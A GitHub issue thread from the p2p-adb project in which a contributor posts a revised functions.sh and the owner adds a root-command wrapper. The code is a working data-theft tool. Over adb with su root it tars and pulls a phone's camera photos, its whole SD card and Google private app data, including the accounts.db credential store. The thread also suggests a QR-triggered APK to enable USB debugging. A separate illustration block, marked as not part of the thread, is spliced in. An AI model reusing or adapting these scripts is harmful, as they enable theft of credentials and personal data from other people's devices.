Not really an issue more of an update.. #1

Closed
jadedsecurity opened this Issue Aug 13, 2012 · 6 comments


You rock bro!!!

On stock roms the IMG has to be rebuilt to force adb into a default root shell.. I updated functions.sh to

if [ "$(adb shell "su -c 'whoami'" | tr -d '\r' )" = 'uid=0(root) gid=0(root)' ]; then

Works fine.. you also need to either set a variable for adb shell su or just add it to the rest of the functions like

adb shell "su -c 'command1; command2; command3'"

And Google Data on Jelly Bean is now

/data/system/users/0/accounts.db

so maybe an elif for 4.1>

version=$(adb shell getprop | awk -F":" '/build.version.release/ { print $2 }' | tr -d '[]')

Owner

kosborn commented Aug 14, 2012

That's a good point, I should probably work on passing su with every command when it's found that you're not already root.

Yeah, I've been planning on updating it to support the multi-account. Thanks.

Here is my updated functions.sh, I've been messing with getting USB Debug enabled using something like SET for a while.. Maybe a QR code that installs an APK that does it. There used to be a toggle app but I can't find it.


# Let's just make sure ADB is available...

if adb version >/dev/null; then
        # good to go
        true
else
        echo "${red}adb is not in your \$PATH"
        echo "Add it, or modify run.sh${none}"
        exit
fi


# Check to see if a device is connected
isConnected(){

        # $LINECOUNT =
        # 2 if none
        # >2 if yes
        LINECOUNT=$(adb devices|wc -l)


        if [ $LINECOUNT -gt 2 ]
        then
                echo "YES"
                return 0
        else
                echo "NO"
                return 1
        fi
}

# Check to see if we're root on the device
isRoot(){

        YayRoot=$(adb shell "su -c 'cd /root'")

        if [ "$?" = "0" ]
        then
                echo "You are GOD"
                return 0
        else
                echo "Running as shell"
                return 1
        fi
}

# Check the size of a directory or more
dataSize(){
        adb shell "su -c '"du -hc $*"'" | tail -n1
}



# Prepare to get the directory passed in the argument
getData(){
        DATAPATH="$*"
        echo "Calculating size of: $DATAPATH"
        SIZE=$(dataSize "$DATAPATH")
        echo "The size of $DATAPATH is: $SIZE"
        echo -n 'Continue? [Y/n] '
        read REPLY
        case "$REPLY" in
         y|Y|'') getDataProto "$DATAPATH"  ;;
         n|N) echo "Cancelling..." ;;
         *) echo "Cancelling..." ;;
        esac
}

# Actually get the file
getDataProto(){
        FILENAME=jacked_$(date +%s).tar
        adb shell "su -c 'tar -cf - * 2>/dev/null'" | base64 | tr -d "\r" | base64 -d > "$FILENAME"
        echo "The file has been saved as $FILENAME"
}



# Steal all the pictures
getPhotos(){

DIREXISTS=$(adb shell '[[ -d /sdcard/DCIM/Camera/  ]] && echo 1' | tr -d "\r")

if [ "$DIREXISTS" = "1" ]; then
        DATAPATH='/sdcard/DCIM/Camera'
        getSearch "$DATAPATH" "*.jpg" "+200k"
else
        echo "Camera directory doesn't exist?"
fi
}

# Steal Google Private App data
getGoogles(){

jellybean=$(adb shell "su -c 'ls /data/user/0/'")

if [ "$?" = "0" ]
then
        beandata='/data/user/0/*'
        echo "This is jellyBean, Stealing all the Secrets"
        adb shell "su -c 'tar -cf - $beandata 2>/dev/null'" | base64 | tr -d "\r" | base64 -d > jellybeandata$(date +%s).tar
elif [ "$?" = "1" ]
then
        nonbeandata='/data/data/com.google.*'
        echo "Pre JellyBean going to Steal the old way"
        adb shell "su -c 'tar -cf - $nonbeandata 2>/dev/null'" | base64 | tr -d "\r" | base64 -d > nonbeandata$(date +%s).tar
else
        echo "#Winning"
fi
}

# Actually get the file
getSDCard(){
       
        FILENAME=jackedsdcard_$(date +%s).tar
        adb shell "su -c 'tar -cf - /sdcard/* 2>/dev/null'" | base64 | tr -d "\r" | base64 -d > "$FILENAME"
        echo "The file has been saved as $FILENAME"
}

Owner

kosborn commented Aug 14, 2012

You wanna reformat that using GitHub's markdown? :)

Meh... I don't always git but when I do it's always wrong..

Owner

kosborn commented Aug 25, 2012

I've implemented some of the changes in my own code (limitations of sh required me to do some other crap, so I couldn't take verbatim from you.) Commit d271e24.

Non-root -> root (if possible) is now abstracted to the "command" alias.

command(){
        echo "$*" > $TMP/p2p-tmp
        adb push $TMP/p2p-tmp $RTMP/p2p-tmp 2>/dev/null
        if [ "$ISROOT" -eq "1" ]
        then
                adb shell "su -c 'sh $RTMP/p2p-tmp'" | tr -d "\r"
        else
                adb shell "sh $RTMP/p2p-tmp" | tr -d "\r"
        fi
        adb shell "rm $RTMP/p2p-tmp" 2>/dev/null
}

Also, instead of passing commands directly to adb shell, the commands will be thrown into a file, and adb pushed to the phone to a temporary folder (/data/share/tmp/ appears to always be there), and execute the shell script there. I think the way I'm sticking them into the file (the echo "$*" part) is sane...

There are also 4 possible IDs for $ISROOT (variable should probably be renamed, actually.)
0 = root immediately.
1 = root after 'su'.
2 = shell user
3 = what is this I don't even (seriously, this probably means the script screwed up, or the shell user isn't UID 2000, which I don't think is possible.)
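
An added illustration (not part of the thread or of p2p-adb's code) of what the `echo "$*"` step in `command()` above writes to the temporary script: the arguments are joined with single spaces, so an argument that contains whitespace is split again when `sh` reads the file. `flatten`, `quote_args` and `count_args` are hypothetical helper names and the path is a constructed sample; everything runs locally, without adb.

```sh
#!/bin/sh
# flatten: the line that `echo "$*" > file` stores, i.e. all arguments
# joined by spaces, with the original argument boundaries discarded.
flatten() {
        printf '%s\n' "$*"
}

# quote_args: serialise each argument inside single quotes (embedded
# single quotes become '\''), so a shell reading the line back
# reconstructs exactly the same argument list.
quote_args() {
        out=
        for arg in "$@"; do
                esc=$(printf '%s' "$arg" | sed "s/'/'\\\\''/g")
                out="$out${out:+ }'$esc'"
        done
        printf '%s\n' "$out"
}

# count_args: let a fresh sh parse a serialised line and report how many
# arguments it sees. Only meant for the constructed samples below.
count_args() {
        sh -c "set -- $1; echo \$#"
}

# Constructed sample: a three-argument call whose last argument has a space.
flat=$(flatten du -hc '/sdcard/My Files')
quoted=$(quote_args du -hc '/sdcard/My Files')

echo "flattened: $flat -> $(count_args "$flat") arguments"
echo "quoted:    $quoted -> $(count_args "$quoted") arguments"
```

The flattened form is re-read as four arguments and the quoted form as the original three, so any caller that passes a path with spaces through `"$*"` gets a different command than it asked for.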

Owner

kosborn commented Aug 25, 2012

With the new user profiles, app-data could also be located in a different location, so I'll try to figure out the best way to abstract any call to data to automatically take into account user data (or maybe just pull /data/user//data/ to save time).

@kosborn kosborn closed this Oct 8, 2012
